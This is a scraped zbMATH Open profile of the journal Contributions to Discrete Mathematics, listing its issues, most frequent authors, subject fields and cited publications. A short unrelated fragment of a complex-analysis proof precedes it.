Now since, after removing the singularity, $$g$$ is entire and $$g(0)=0$$, then $$h(z)=\frac{g(z)}{z}$$ also has a removable singularity at $$0$$.
Then $$h$$ becomes an entire function and $$\lim_{z \to \infty} h(z)=0$$ From here it is easy to conclude that $$h$$ is constant.
|
|
# zbMATH — the first resource for mathematics
## Contributions to Discrete Mathematics
Short Title: Contrib. Discrete Math. Publisher: University of Calgary, Calgary, AB ISSN: 1715-0868/e Online: http://cdm.ucalgary.ca/cdm/index.php/cdm/issue/archivehttps://cdm.ucalgary.ca/issue/archive Comments: Indexed cover-to-cover; Published electronic only as of Vol. 1 (2006). This journal is available open access.
Documents Indexed: 290 Publications (since 2006) References Indexed: 94 Publications with 1,467 References.
all top 5
#### Latest Issues
16, No. 2 (2021) 16, No. 1 (2021) 15, No. 3 (2020) 15, No. 2 (2020) 15, No. 1 (2020) 14, No. 1 (2019) 13, No. 2 (2018) 13, No. 1 (2018) 12, No. 2 (2017) 12, No. 1 (2017) 11, No. 2 (2017) 11, No. 1 (2016) 10, No. 2 (2015) 10, No. 1 (2015) 9, No. 2 (2014) 9, No. 1 (2014) 8, No. 2 (2013) 8, No. 1 (2013) 7, No. 2 (2012) 7, No. 1 (2012) 6, No. 2 (2011) 6, No. 1 (2011) 5, No. 2 (2010) 5, No. 1 (2010) 4, No. 2 (2009) 4, No. 1 (2009) 3, No. 2 (2008) 3, No. 1 (2008) 2, No. 2 (2007) 2, No. 1 (2007) 1, No. 1 (2006)
all top 5
#### Authors
8 Bonato, Anthony 6 Tao, Terence 5 Pouzet, Maurice 4 Gionfriddo, Mario 4 Ille, Pierre 4 MacGillivray, Gary 4 Merca, Mircea 3 Goyal, Megha 3 Korchmáros, Gábor 3 Milici, Salvatore 3 Prałat, Paweł 3 Si-Kaddour, Hamza 3 Spirova, Margarita Georgieva 3 Szőnyi, Tamás 3 Woodrow, Robert E. 3 Yao, Olivia Xiang Mei 3 Zhou, Sizhong 2 Aguglia, Angela 2 Andres, Stephan Dominique 2 Berman, Leah Wrenn 2 Bilge, Doǧan 2 Bonacini, Paola 2 Bose, Prosenjit K. 2 Boussairi, Abderrahim 2 Chu, Wenchang 2 Coskey, Samuel 2 Cossidente, Antonio 2 Dujmović, Vida 2 El Bachraoui, Mohamed 2 Fink, Alex 2 Galeana-Sánchez, Hortensia 2 Gordinowicz, Przemysław 2 Grünbaum, Branko 2 Guy, Richard Kenneth 2 Hemmecke, Raymond 2 Henning, Michael Anthony 2 Hubička, Jan 2 Jahn, Thomas 2 Juricevic, Robert 2 Kamiński, Marcin Marek 2 Kathiresan, Kumarappan 2 Kawamura, Kazuhiro 2 Kiss, György 2 Kochol, Martin 2 Konečný, Matěj 2 Laflamme, Claude 2 Maity, Dipendu 2 Marcugini, Stefano 2 Marino, Lucia 2 Mellinger, Keith E. 2 Messinger, Margaret-Ellen 2 Mixer, Mark 2 Napolitano, Vito 2 Naszódi, Márton 2 O’reilly-Regueiro, Eugenia 2 Pambianco, Fernanda 2 Qi, Feng 2 Rana, Meenakshi 2 Samadi, Babak 2 Sauer, Norbert W. 2 Scheidler, Renate 2 Sun, Zhiren 2 Tawbe, Khalil 2 Thomas, Robert S. D. 2 Tripodi, Antoinette 2 Upadhyay, Ashish Kumar 2 Vega, Oscar 2 Volkmann, Lutz 2 Vuillon, Laurent 2 Wang, Changping 2 Witte Morris, Dave 2 Wood, David Ronald 2 Zaguia, Imed 2 Zaker, Manouchehr 1 Aaghabali, Mehdi 1 Abatangelo, Vito 1 Abreu, Marién 1 Adamaszek, Michal 1 Agarwal, Ashok Kumar 1 Agustín-Aquino, Octavio A. 1 Akbari, Saieed 1 Akbary, Amir 1 Alfakih, Abdo Y. 1 Aliev, Iskander M. 1 Alikhani, Saeid 1 Alipour, Sharareh 1 Allagan, Julian D. 1 Alsairafi, Alyeah 1 Anholcer, Marcin 1 Anusha Devi, P. 1 Aranda, Andrés 1 Arce-Nazario, Rafael A. 1 Arezoomand, Majid 1 Ariannejad, Masoud 1 Ashraf, Mohammad 1 Attarzadeh, Fatemeh 1 Avelino, Catarina Pina 1 Bača, Martin 1 Bahadir, Selim 1 Bailey, Robert F. ...and 354 more Authors
all top 5
#### Fields
198 Combinatorics (05-XX) 52 Convex and discrete geometry (52-XX) 50 Number theory (11-XX) 37 Geometry (51-XX) 20 Group theory and generalizations (20-XX) 16 Order, lattices, ordered algebraic structures (06-XX) 12 Computer science (68-XX) 11 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 10 Mathematical logic and foundations (03-XX) 9 Information and communication theory, circuits (94-XX) 7 General topology (54-XX) 6 Operations research, mathematical programming (90-XX) 5 Linear and multilinear algebra; matrix theory (15-XX) 5 Special functions (33-XX) 5 Dynamical systems and ergodic theory (37-XX) 5 Functional analysis (46-XX) 5 Algebraic topology (55-XX) 4 Commutative algebra (13-XX) 3 General and overarching topics; collections (00-XX) 3 Algebraic geometry (14-XX) 3 Topological groups, Lie groups (22-XX) 2 History and biography (01-XX) 2 Associative rings and algebras (16-XX) 2 Manifolds and cell complexes (57-XX) 2 Numerical analysis (65-XX) 2 Mechanics of particles and systems (70-XX) 1 General algebraic systems (08-XX) 1 Nonassociative rings and algebras (17-XX) 1 Real functions (26-XX) 1 Functions of a complex variable (30-XX) 1 Probability theory and stochastic processes (60-XX) 1 Statistics (62-XX)
#### Citations contained in zbMATH Open
151 Publications have been cited 555 times in 523 Documents Cited by Year
Coloring edges and vertices of graphs without short or long cycles. Zbl 1188.05065
2007
The sum-product phenomenon in arbitrary rings. Zbl 1250.11011
Tao, Terence
2009
Szemerédi’s regularity lemma revisited. Zbl 1093.05030
Tao, Terence
2006
The distribution of polynomials over finite fields, with applications to the Gowers norms. Zbl 1225.11017
Green, Ben; Tao, Terence
2009
Diagonal recurrence relations for the Stirling numbers of the first kind. Zbl 1360.11051
Qi, Feng
2016
Freiman’s theorem for solvable groups. Zbl 1332.11015
Tao, Terence
2010
An improved bound on the number of point-surface incidences in three dimensions. Zbl 1317.52022
Zahl, Joshua
2013
On geometric constructions of $$(k,g)$$-graphs. Zbl 1203.05076
Gács, András; Héger, Tamás
2008
Expanding polynomials over finite fields of large characteristic, and a regularity lemma for definable sets. Zbl 1370.11135
Tao, Terence
2015
The cop density of a graph. Zbl 1203.05131
Bonato, Anthony; Hahn, Geňa; Wang, Changping
2007
The search for N-e.c. Graphs. Zbl 1203.05138
Bonato, Anthony
2009
Characterizations and algorithms for generalized cops and robbers games. Zbl 1376.05087
Bonato, Anthony; MacGillivray, Gary
2017
Polytopes derived from sporadic simple groups. Zbl 1320.51021
Hartley, Michael Ian; Hulpke, Alexander
2010
Affinely regular polygons in an affine plane. Zbl 1193.51011
Korchmáros, Gábor; Szőnyi, Tamás
2008
Injective and non-injective realizations with symmetry. Zbl 1189.52021
Schulze, Bernd
2010
Sum and product of different sets. Zbl 1134.11008
Chang, Mei-Chu
2006
LC reductions yield isomorphic simplicial complexes. Zbl 1191.52011
Matoušek, Jiří
2008
On the universal rigidity of generic bar frameworks. Zbl 1189.52020
Alfakih, Abdo Y.
2010
The cops and robber game on graphs with forbidden (induced) subgraphs. Zbl 1317.05121
Joret, Gwenaël; Kamiński, Marcin; Theis, Dirk Oliver
2010
Claw-freeness, 3-homogeneous subsets of a graph and a reconstruction problem. Zbl 1317.05127
Pouzet, Maurice; Kaddour, Hamza Si; Trotignon, Nicolas
2011
Algorithms for classifying regular polytopes with a fixed automorphism group. Zbl 1317.51019
Leemans, Dimitri; Mixer, Mark
2012
Elements of finite order in automorphism groups of homogeneous structures. Zbl 1321.20003
Bilge, Doǧan; Melleray, Julien
2013
On primitive symmetric association schemes with $$m_1=3$$. Zbl 1093.05073
Bannai, Eiichi; Bannai, Etsuko
2006
A survey on semiovals. Zbl 1206.51008
Kiss, György
2008
Fold and Mycielskian on homomorphism complexes. Zbl 1247.55003
Csorba, Péter
2008
Partially critical tournaments and partially critical supports. Zbl 1318.05031
Sayar, Mohamed Y.
2011
On the minimum order of $$k$$-cop-win graphs. Zbl 1317.05118
Baird, William; Beveridge, Andrew; Bonato, Anthony; Codenotti, Paolo; Maurer, Aaron; McCauley, John; Valeva, Silviya
2014
Constructions of small complete arcs with prescribed symmetry. Zbl 1189.51007
Lisoněk, Petr; Marcugini, Stefano; Pambianco, Fernanda
2008
Fractional illumination of convex bodies. Zbl 1189.52005
Naszódi, Márton
2009
Closing the gap: eternal domination on $$3 \times n$$ grids. Zbl 1376.05114
Messinger, Margaret-Ellen
2017
Generalized CPR-graphs and applications. Zbl 1320.51024
Pellicer, Daniel; Weiss, Asia Ivić
2010
The rigidity of periodic frameworks as graphs on a fixed torus. Zbl 1317.52028
Ross, Elissa
2014
Interlacement in 4-regular graphs: a new approach using nonsymmetric matrices. Zbl 1317.05092
Traldi, Lorenzo
2014
New combinatorial interpretations of some Rogers-Ramanujan type identities. Zbl 1365.05015
Goyal, Megha
2017
Some remarks on the lonely runner conjecture. Zbl 1451.11088
Tao, Terence
2018
Partially critical indecomposable graphs. Zbl 1188.05099
Breiner, Andrew; Deogun, Jitender; Ille, Pierre
2008
Weakly partitive families on infinite sets. Zbl 1203.05013
Ille, Pierre; Woodrow, Robert
2009
Computing holes in semi-groups and its applications to transportation problems. Zbl 1203.90115
Hemmecke, Raymond; Takemura, Akimichi; Yoshida, Ruriko
2009
On bisectors in normed planes. Zbl 1352.46015
Jahn, Thomas; Spirova, Margarita
2015
Cones of partial metrics. Zbl 1323.51004
Deza, Michel; Deza, Elena
2011
A bijection between noncrossing and nonnesting partitions of types A, B and C. Zbl 1317.05022
Mamede, Ricardo
2011
Quasi-Hermitian varieties in $$PG(r,q^2)$$, $$q$$ even. Zbl 1317.51005
Aguglia, Angela
2013
An inductive construction of $$(2,1)$$-tight graphs. Zbl 1317.52027
Nixon, Anthony; Owen, John C.
2014
A short construction of highly chromatic digraphs without short cycles. Zbl 1317.05079
Severino, Michael
2014
Face module for realizable $$\mathbb{Z}$$-matroids. Zbl 1435.05044
Martino, Ivan
2018
Closed formulas and identities on the Bell polynomials and falling factorials. Zbl 1471.11102
Qi, Feng; Niu, Da-Wei; Lim, Dongkyu; Guo, Bai-Ni
2020
Arcs in desarguesian nets. Zbl 1204.51010
Beato, Annalisa; Faina, Giorgio; Giulietti, Massimo
2008
On universally rigid frameworks on the line. Zbl 1344.52013
Jordán, Tibor; Viet Hang Nguyen
2015
Automorphisms of circulants that respect partitions. Zbl 1341.05215
Morris, Joy
2016
Barnes-type Boole polynomials. Zbl 1360.11055
Kim, Dae San; Kim, Taekyun
2016
Group irregular labelings of disconnected graphs. Zbl 1376.05133
Anholcer, Marcin; Cichacz-Przenioslo, Sylwia
2017
Signed $$b$$-matchings and $$b$$-edge covers of strong product graphs. Zbl 1317.05156
Wang, Changping
2010
Homotopy types of independence complexes of forests. Zbl 1317.05037
Kawamura, Kazuhiro
2010
Option-closed games. Zbl 1367.91043
Nowakowski, Richard J.; Ottaway, Paul
2011
Strong $$d$$-collapsibility. Zbl 1317.05198
Tancer, Martin
2011
On characterizing game-perfect graphs by forbidden induced subgraphs. Zbl 1317.05045
Andres, Stephan Dominique
2012
2-generated Cayley digraphs on nilpotent groups have Hamiltonian paths. Zbl 1317.05074
Morris, Dave Witte
2012
The exact maximal energy of integral circulant graphs with prime power order. Zbl 1317.05114
Sander, Jürgen W.; Sander, Torsten
2013
On the order of appearance of product of consecutive Fibonacci numbers. Zbl 1443.11014
Khaochim, Narissara; Pongsriiam, Prapanpong
2018
The complexity of power graphs associated with finite groups. Zbl 07032112
Kirkland, Steve; Moghaddamfar, Ali Reza; Salehy, S. Navid; Salehy, S. Nima; Zohouratar, Mahsa
2018
Latin squares and their Bruhat order. Zbl 1445.05021
Fernandes, Rosário; da Cruz, Henrique F.; Salomão, Domingos
2020
Minimum size blocking sets of certain line sets with respect to an elliptic quadric in $$\mathrm{PG}(3,q)$$. Zbl 1467.51008
De Bruyn, Bart; Pradhan, Puspendu; Sahoo, Binod Kumar
2020
$$N$$-free extensions of posets. Note on a theorem of P. A. Grillet. Zbl 1097.06002
Pouzet, Maurice; Zaguia, Nejib
2006
On the oriented chromatic number of dense graphs. Zbl 1203.05061
Wood, David R.
2007
Explicit upper bounds for $$f(n)=\prod_{p_{\omega(n)}} \frac{p}{p-1}$$. Zbl 1242.11069
Akbary, Amir; Friggstad, Zachary; Juricevic, Robert
2007
Bounds on the f-vectors of tight spans. Zbl 1204.52013
Joswig, Michael; Herrmann, Sven
2007
Priestley duality for some algebras with a negation operator. Zbl 1187.06008
Celani, Sergio A.
2007
A complete span of $$\mathcal H(4,4)$$ admitting $$PSL_2(11)$$ and related structures. Zbl 1193.51012
Cossidente, Antonio; Ebert, Gary L.; Marino, Giuseppe
2008
Configurations graphs of neighbourhood geometries. Zbl 1258.05084
Abreu, Marien; Funk, Martin; Labbate, Domenico; Napolitano, Vito
2008
Colourful transversal theorems. Zbl 1204.52010
Oliveros, Deborah; Montejano, Luis
2008
$$\{-1,2\}$$-hypomorphy and hereditary hypomorphy coincide for posets. Zbl 1203.05102
2009
A characterization of the base-matroids of a graphic matroid. Zbl 1203.05029
Maffioli, Francesco; Salvi, Norma Zagaglia
2010
A theorem on fractional ID-$$(g,f)$$-factor-critical graphs. Zbl 1341.05217
Zhou, Sizhong; Sun, Zhiren; Xu, Yang
2015
A lower bound for radio $$k$$-chromatic number of an arbitrary graph. Zbl 1341.05109
Kola, Srinivasa Rao; Panigrahi, Pratima
2015
The annihilating-ideal graph of $$\mathbb{Z}_n$$ is weakly perfect. Zbl 1341.05124
Nikandish, Reza; Maimani, Hamidreza; Izanloo, Hasan
2016
Sun toughness and $$P_{\geq3}$$-factors in graphs. Zbl 1444.05115
Zhou, Sizhong
2019
Distinguishing number and distinguishing index of neighbourhood corona of two graphs. Zbl 1444.05051
Alikhani, Saeid; Soltani, Samaneh
2019
Generating special arithmetic functions by Lambert series factorizations. Zbl 1470.11008
Merca, Mircea; Schmidt, Maxie Dion
2019
Bounds on several versions of restrained domination number. Zbl 1376.05115
2017
On combinatorial extensions of Rogers-Ramanujan type identities. Zbl 1376.05005
Goyal, Megha
2017
On chromatic number of general Kneser graphs. Zbl 1376.05045
Alipour, Sharareh; Jafari, Amir
2017
Bounds for the $$m$$-eternal domination number of a graph. Zbl 1376.05112
Henning, Michael A.; Klostermeyer, William F.; MacGillivray, Gary
2017
Split $$(n + t)$$-color partitions and 2-color $$F$$-partitions. Zbl 1376.05012
Rana, Meenakshi; Sareen, J. K.
2017
Internal and external duality in abstract polytopes. Zbl 06820596
Cunningham, Gabe; Mixer, Mark
2017
Bounds and constructions for $$n$$-e.c. tournaments. Zbl 1317.05160
Bonato, Anthony; Gordinowicz, Przemysław; Prałat, Paweł
2010
Signed star $$k$$-domatic number of a graph. Zbl 1317.05142
Sheikholeslami, Seyed Mahmoud; Volkmann, Lutz
2011
Notes on the illumination parameters of convex bodies. Zbl 1317.52006
Kiss, György; de Wet, Pieter Oloff
2012
Deformations of associahedra and visibility graphs. Zbl 1317.52018
Devadoss, Satyan L.; Shah, Rahul; Shao, Xuancheng; Winston, Ezra
2012
Determination of the prime bound of a graph. Zbl 1317.05135
Boussaïri, Abderrahim; Ille, Pierre
2014
On cycle packings and feedback vertex sets. Zbl 1317.05147
Chappell, Glenn G.; Gimbel, John; Hartman, Chris
2014
On uniformly resolvable $$\{K_2, p_k\}$$-designs with $$k=3,4$$. Zbl 1327.05034
Gionfriddo, Mario; Milici, Salvatore
2015
On the enumeration of a class of toroidal graphs. Zbl 1387.52029
2018
Loose Hamiltonian cycles forced by large $$(k-2)$$-degree – sharp version. Zbl 1409.05142
de Oliveira Bastos, Josefran; Mota, Guilherme Oliveira; Schacht, Mathias; Schnitzer, Jakob; Schulenburg, Fabian
2018
Small on-line Ramsey numbers – a new approach. Zbl 1406.05108
Gordinowicz, Przemysław; Prałat, Paweł
2018
Arrangements of homothets of a convex body. II. Zbl 1410.52014
2018
Construction of strongly regular graphs having an automorphism group of composite order. Zbl 07232870
Crnković, Dean; Maksimović, Marija
2020
On parity and recurrences for certain partition functions. Zbl 1445.05016
Nyirenda, Darlison
2020
3-uniform hypergraphs: modular decomposition and realization by tournaments. Zbl 1447.05144
Boussaïri, Abderrahim; Chergui, Brahim; Ille, Pierre; Zaidi, Mohamed
2020
Best simultaneous Diophantine approximations under a constraint on the denominator. Zbl 1139.11031
Aliev, Iskander; Gruber, Peter
2006
Induced subgraphs of bounded degree and bounded treewidth. Zbl 1092.05033
Bose, Prosenjit; Dujmović, Vida; Wood, David R.
2006
Canonical functions: a proof via topological dynamics. Zbl 07406819
Pinsker, Michael; Bodirsky, Manuel
2021
Lengths of extremal square-free ternary words. Zbl 1467.68149
2021
A survey of graph burning. Zbl 1457.05068
Bonato, Anthony
2021
Closed formulas and identities on the Bell polynomials and falling factorials. Zbl 1471.11102
Qi, Feng; Niu, Da-Wei; Lim, Dongkyu; Guo, Bai-Ni
2020
Latin squares and their Bruhat order. Zbl 1445.05021
Fernandes, Rosário; da Cruz, Henrique F.; Salomão, Domingos
2020
Minimum size blocking sets of certain line sets with respect to an elliptic quadric in $$\mathrm{PG}(3,q)$$. Zbl 1467.51008
De Bruyn, Bart; Pradhan, Puspendu; Sahoo, Binod Kumar
2020
Construction of strongly regular graphs having an automorphism group of composite order. Zbl 07232870
Crnković, Dean; Maksimović, Marija
2020
On parity and recurrences for certain partition functions. Zbl 1445.05016
Nyirenda, Darlison
2020
3-uniform hypergraphs: modular decomposition and realization by tournaments. Zbl 1447.05144
Boussaïri, Abderrahim; Chergui, Brahim; Ille, Pierre; Zaidi, Mohamed
2020
Sun toughness and $$P_{\geq3}$$-factors in graphs. Zbl 1444.05115
Zhou, Sizhong
2019
Distinguishing number and distinguishing index of neighbourhood corona of two graphs. Zbl 1444.05051
Alikhani, Saeid; Soltani, Samaneh
2019
Generating special arithmetic functions by Lambert series factorizations. Zbl 1470.11008
Merca, Mircea; Schmidt, Maxie Dion
2019
On the illumination of a class of convex bodies. Zbl 1453.52005
Wu, Senlin; Zhou, Ying
2019
A wide class of combinatorial matrices related with reciprocal Pascal and super Catalan matrices. Zbl 1452.15020
Kilic, Emrah; Prodinger, Helmut
2019
Feedback vertex number of Sierpiński-type graphs. Zbl 1444.05074
Yuan, Lili; Wu, Baoyindureng; Zhao, Biao
2019
Some remarks on the lonely runner conjecture. Zbl 1451.11088
Tao, Terence
2018
Face module for realizable $$\mathbb{Z}$$-matroids. Zbl 1435.05044
Martino, Ivan
2018
On the order of appearance of product of consecutive Fibonacci numbers. Zbl 1443.11014
Khaochim, Narissara; Pongsriiam, Prapanpong
2018
The complexity of power graphs associated with finite groups. Zbl 07032112
Kirkland, Steve; Moghaddamfar, Ali Reza; Salehy, S. Navid; Salehy, S. Nima; Zohouratar, Mahsa
2018
On the enumeration of a class of toroidal graphs. Zbl 1387.52029
2018
Loose Hamiltonian cycles forced by large $$(k-2)$$-degree – sharp version. Zbl 1409.05142
de Oliveira Bastos, Josefran; Mota, Guilherme Oliveira; Schacht, Mathias; Schnitzer, Jakob; Schulenburg, Fabian
2018
Small on-line Ramsey numbers – a new approach. Zbl 1406.05108
Gordinowicz, Przemysław; Prałat, Paweł
2018
Arrangements of homothets of a convex body. II. Zbl 1410.52014
2018
String C-groups of order 1024. Zbl 1398.20032
Gomi, Yasushi; Loyola, Mark; De Las Peñas, Ma. Louise Antonette
2018
A characterization of well-founced algebraic lattices. Zbl 06859434
Chakir, Ilham; Pouzet, Maurice
2018
Characterizations and algorithms for generalized cops and robbers games. Zbl 1376.05087
Bonato, Anthony; MacGillivray, Gary
2017
Closing the gap: eternal domination on $$3 \times n$$ grids. Zbl 1376.05114
Messinger, Margaret-Ellen
2017
New combinatorial interpretations of some Rogers-Ramanujan type identities. Zbl 1365.05015
Goyal, Megha
2017
Group irregular labelings of disconnected graphs. Zbl 1376.05133
Anholcer, Marcin; Cichacz-Przenioslo, Sylwia
2017
Bounds on several versions of restrained domination number. Zbl 1376.05115
2017
On combinatorial extensions of Rogers-Ramanujan type identities. Zbl 1376.05005
Goyal, Megha
2017
On chromatic number of general Kneser graphs. Zbl 1376.05045
Alipour, Sharareh; Jafari, Amir
2017
Bounds for the $$m$$-eternal domination number of a graph. Zbl 1376.05112
Henning, Michael A.; Klostermeyer, William F.; MacGillivray, Gary
2017
Split $$(n + t)$$-color partitions and 2-color $$F$$-partitions. Zbl 1376.05012
Rana, Meenakshi; Sareen, J. K.
2017
Internal and external duality in abstract polytopes. Zbl 06820596
Cunningham, Gabe; Mixer, Mark
2017
Geometric algorithms for minimal enclosing disks in strictly convex normed planes. Zbl 1380.90218
Jahn, Thomas
2017
Independence complexes and incidence graphs. Zbl 1376.05105
Tsukuda, Shuichi
2017
The conjugacy problem for automorphism groups of homogeneous digraphs. Zbl 06820572
Coskey, Samuel; Ellis, Paul
2017
Comments on the golden partition conjecture. Zbl 1378.06001
Peczarski, Marcin Piotr
2017
Conjectures on uniquely 3-edge-colorable graphs. Zbl 1376.05059
Matsumoto, Naoki
2017
The non-existence of distance-2 ovoids in $$\mathsf{H}(q)^{(D)}$$. Zbl 1381.51002
Bishnoi, Anurag; Ihringer, Ferdinand
2017
Lower bounds on the distance domination number of a graph. Zbl 1376.05108
Davila, Randy Ryan; Fast, Caleb; Henning, Michael A.; Kenter, Franklin
2017
Shellability, vertex decomposability, and lexicographical products of graphs. Zbl 1376.05171
van der Meulen, Kevin N.; van Tuyl, Adam
2017
Contractions of polygons in abstract polytopes. I. Zbl 1368.52007
Scheidwasser, Ilya
2017
Diagonal recurrence relations for the Stirling numbers of the first kind. Zbl 1360.11051
Qi, Feng
2016
Automorphisms of circulants that respect partitions. Zbl 1341.05215
Morris, Joy
2016
Barnes-type Boole polynomials. Zbl 1360.11055
Kim, Dae San; Kim, Taekyun
2016
The annihilating-ideal graph of $$\mathbb{Z}_n$$ is weakly perfect. Zbl 1341.05124
Nikandish, Reza; Maimani, Hamidreza; Izanloo, Hasan
2016
Distinct values of bilinear forms on algebraic curves. Zbl 1342.52019
Valculescu, Claudiu; De Zeeuw, Frank
2016
Expanding polynomials over finite fields of large characteristic, and a regularity lemma for definable sets. Zbl 1370.11135
Tao, Terence
2015
On bisectors in normed planes. Zbl 1352.46015
Jahn, Thomas; Spirova, Margarita
2015
On universally rigid frameworks on the line. Zbl 1344.52013
Jordán, Tibor; Viet Hang Nguyen
2015
A theorem on fractional ID-$$(g,f)$$-factor-critical graphs. Zbl 1341.05217
Zhou, Sizhong; Sun, Zhiren; Xu, Yang
2015
A lower bound for radio $$k$$-chromatic number of an arbitrary graph. Zbl 1341.05109
Kola, Srinivasa Rao; Panigrahi, Pratima
2015
On uniformly resolvable $$\{K_2, p_k\}$$-designs with $$k=3,4$$. Zbl 1327.05034
Gionfriddo, Mario; Milici, Salvatore
2015
On the chromatic index of Latin squares. Zbl 1341.05017
Cavenagh, Nicholas J.; Kuhl, Jaromy
2015
A curious polynomial interpolation of Carlitz-Riordan’s $$q$$-ballot numbers. Zbl 1327.05011
Chapoton, Frédéric; Zeng, Jiang
2015
On the minimum order of $$k$$-cop-win graphs. Zbl 1317.05118
Baird, William; Beveridge, Andrew; Bonato, Anthony; Codenotti, Paolo; Maurer, Aaron; McCauley, John; Valeva, Silviya
2014
The rigidity of periodic frameworks as graphs on a fixed torus. Zbl 1317.52028
Ross, Elissa
2014
Interlacement in 4-regular graphs: a new approach using nonsymmetric matrices. Zbl 1317.05092
Traldi, Lorenzo
2014
An inductive construction of $$(2,1)$$-tight graphs. Zbl 1317.52027
Nixon, Anthony; Owen, John C.
2014
A short construction of highly chromatic digraphs without short cycles. Zbl 1317.05079
Severino, Michael
2014
Determination of the prime bound of a graph. Zbl 1317.05135
Boussaïri, Abderrahim; Ille, Pierre
2014
On cycle packings and feedback vertex sets. Zbl 1317.05147
Chappell, Glenn G.; Gimbel, John; Hartman, Chris
2014
Kneser-Poulsen conjecture for a small number of intersections. Zbl 1317.52004
Gorbovickis, Igors
2014
A short note on integer complexity. Zbl 1371.37010
Steinerberger, Stefan
2014
The copnumber for lexicographic products and sums of graphs. Zbl 1317.05123
Schröder, Bernd S. W.
2014
An improved bound on the number of point-surface incidences in three dimensions. Zbl 1317.52022
Zahl, Joshua
2013
Elements of finite order in automorphism groups of homogeneous structures. Zbl 1321.20003
Bilge, Doǧan; Melleray, Julien
2013
Quasi-Hermitian varieties in $$PG(r,q^2)$$, $$q$$ even. Zbl 1317.51005
Aguglia, Angela
2013
The exact maximal energy of integral circulant graphs with prime power order. Zbl 1317.05114
Sander, Jürgen W.; Sander, Torsten
2013
$$2L$$ convex polyominoes: discrete tomographical aspects. Zbl 1317.52034
Tawbe, Khalil; Vuillon, Laurent
2013
Translation planes of order $$23^2$$. Zbl 1317.51001
Abatangelo, Vito; Emma, Daniela; Larato, Bambina
2013
The Erdős-Ko-Rado basis for a Leonard system. Zbl 1317.05185
Tanaka, Hajime
2013
Cycles, wheels, and gears in finite planes. Zbl 1317.05126
Peabody, Jamie; Vega, Oscar; White, Jordan
2013
Algorithms for classifying regular polytopes with a fixed automorphism group. Zbl 1317.51019
Leemans, Dimitri; Mixer, Mark
2012
On characterizing game-perfect graphs by forbidden induced subgraphs. Zbl 1317.05045
Andres, Stephan Dominique
2012
2-generated Cayley digraphs on nilpotent groups have Hamiltonian paths. Zbl 1317.05074
Morris, Dave Witte
2012
Notes on the illumination parameters of convex bodies. Zbl 1317.52006
Kiss, György; de Wet, Pieter Oloff
2012
Deformations of associahedra and visibility graphs. Zbl 1317.52018
Devadoss, Satyan L.; Shah, Rahul; Shao, Xuancheng; Winston, Ezra
2012
Decoding generalised hyperoctahedral groups and asymptotic analysis of correctible error patterns. Zbl 1317.94157
Bailey, Robert F.; Prellberg, Thomas
2012
Complementaries to Kummer’s degree seven reciprocity law and a Dickson Diophantine system. Zbl 1317.11008
Caranay, Perlas
2012
Domination value in graphs. Zbl 1317.05144
Yi, Eunjeong
2012
Distinguishing homomorphisms of infinite graphs. Zbl 1317.05047
Bonato, Anthony; Delić, Dejan
2012
Frobenius partition theoretic interpretations of some basic series identities. Zbl 1317.05014
Sood, Garima; Agarwal, Ashok K.
2012
Some rigid moieties of homogeneous graphs. Zbl 1317.05189
Bilge, Doǧan; Jaligot, Eric
2012
A discrete Faà di Bruno’s formula. Zbl 1317.26013
Duarte, Pedro; Torres, Maria Joana
2012
Claw-freeness, 3-homogeneous subsets of a graph and a reconstruction problem. Zbl 1317.05127
Pouzet, Maurice; Kaddour, Hamza Si; Trotignon, Nicolas
2011
Partially critical tournaments and partially critical supports. Zbl 1318.05031
Sayar, Mohamed Y.
2011
Cones of partial metrics. Zbl 1323.51004
Deza, Michel; Deza, Elena
2011
A bijection between noncrossing and nonnesting partitions of types A, B and C. Zbl 1317.05022
Mamede, Ricardo
2011
Option-closed games. Zbl 1367.91043
Nowakowski, Richard J.; Ottaway, Paul
2011
Strong $$d$$-collapsibility. Zbl 1317.05198
Tancer, Martin
2011
Signed star $$k$$-domatic number of a graph. Zbl 1317.05142
Sheikholeslami, Seyed Mahmoud; Volkmann, Lutz
2011
On a generalization of the Blaschke-Lebesgue theorem for disk-polygons. Zbl 1321.52002
Bezdek, Máté
2011
Dual linear spaces generated by a non-Desarguesian configuration. Zbl 1327.51011
Nation, James B.; Seffrood, Jiajia Y. G.
2011
A variant of the bipartite relation theorem and its application to clique graphs. Zbl 1317.05038
Kawamura, Kazuhiro
2011
A graph theoretic proof of the complexity of colouring by a local tournament with at least two directed cycles. Zbl 1317.05069
Bang-Jensen, Jørgen; MacGillivray, Gary; Swarts, Jacobus
2011
Freiman’s theorem for solvable groups. Zbl 1332.11015
Tao, Terence
2010
Polytopes derived from sporadic simple groups. Zbl 1320.51021
Hartley, Michael Ian; Hulpke, Alexander
2010
...and 51 more Documents
all top 5
#### Cited by 780 Authors
19 Qi, Feng 12 Bonato, Anthony 11 Golovach, Petr A. 11 Paulusma, Daniël 11 Schulze, Bernd 10 Leemans, Dimitri 9 Guo, Bai-Ni 9 Tao, Terence 8 Marcugini, Stefano 8 Pambianco, Fernanda 7 Bartoli, Daniele 7 Davydov, Alexander A. 7 Faina, Giorgio 7 Sheffer, Adam 6 Araujo-Pardo, Gabriela 6 Balbuena, Camino 6 Ille, Pierre 6 Lozin, Vadim Vladislavovich 6 Malyshev, Dmitry S. 6 Pham Van Thang 6 Song, Jian 6 Vinh, Le Anh 6 Ziegler, Tamar 5 Alfakih, Abdo Y. 5 Boudabbous, Imed 5 Chudnovsky, Maria 5 Green, Ben Joseph 5 Lim, Dongkyu 5 Mc Inerney, Fionn 5 Prałat, Paweł 5 Schaudt, Oliver 5 Sharir, Micha 5 Traldi, Lorenzo 5 Whiteley, Walter John 4 Adamaszek, Michal 4 Belkhechine, Houmem 4 Dammak, Jamel 4 De Bruyn, Bart 4 Goyal, Megha 4 Helfgott, Harald Andrés 4 Messinger, Margaret-Ellen 4 Pavese, Francesco 4 Ries, Bernard 4 Sanders, Tom 4 Si-Kaddour, Hamza 4 Tanigawa, Shin-ichi 4 Yang, Boting 4 Zahl, Joshua 4 Zhong, Mingxian 3 Abreu, Marién 3 Adams, Henry 3 Aguglia, Angela 3 Basu, Saugata 3 Bishnoi, Anurag 3 Boudabbous, Youssef 3 Boussairi, Abderrahim 3 Breuillard, Emmanuel 3 Brijder, Robert 3 Chergui, Brahim 3 Cichacz, Sylwia 3 Clarke, Nancy Ellen 3 Couturier, Jean-Francois 3 Csajbók, Bence 3 Cunningham, Gabe 3 Dabrowski, Konrad Kazimierz 3 Deza, Elena Ivanovna 3 Fernandes, Maria Elisa 3 Giulietti, Massimo 3 Goedgebeur, Jan 3 Hahn, Gena 3 Ham, Le Quang 3 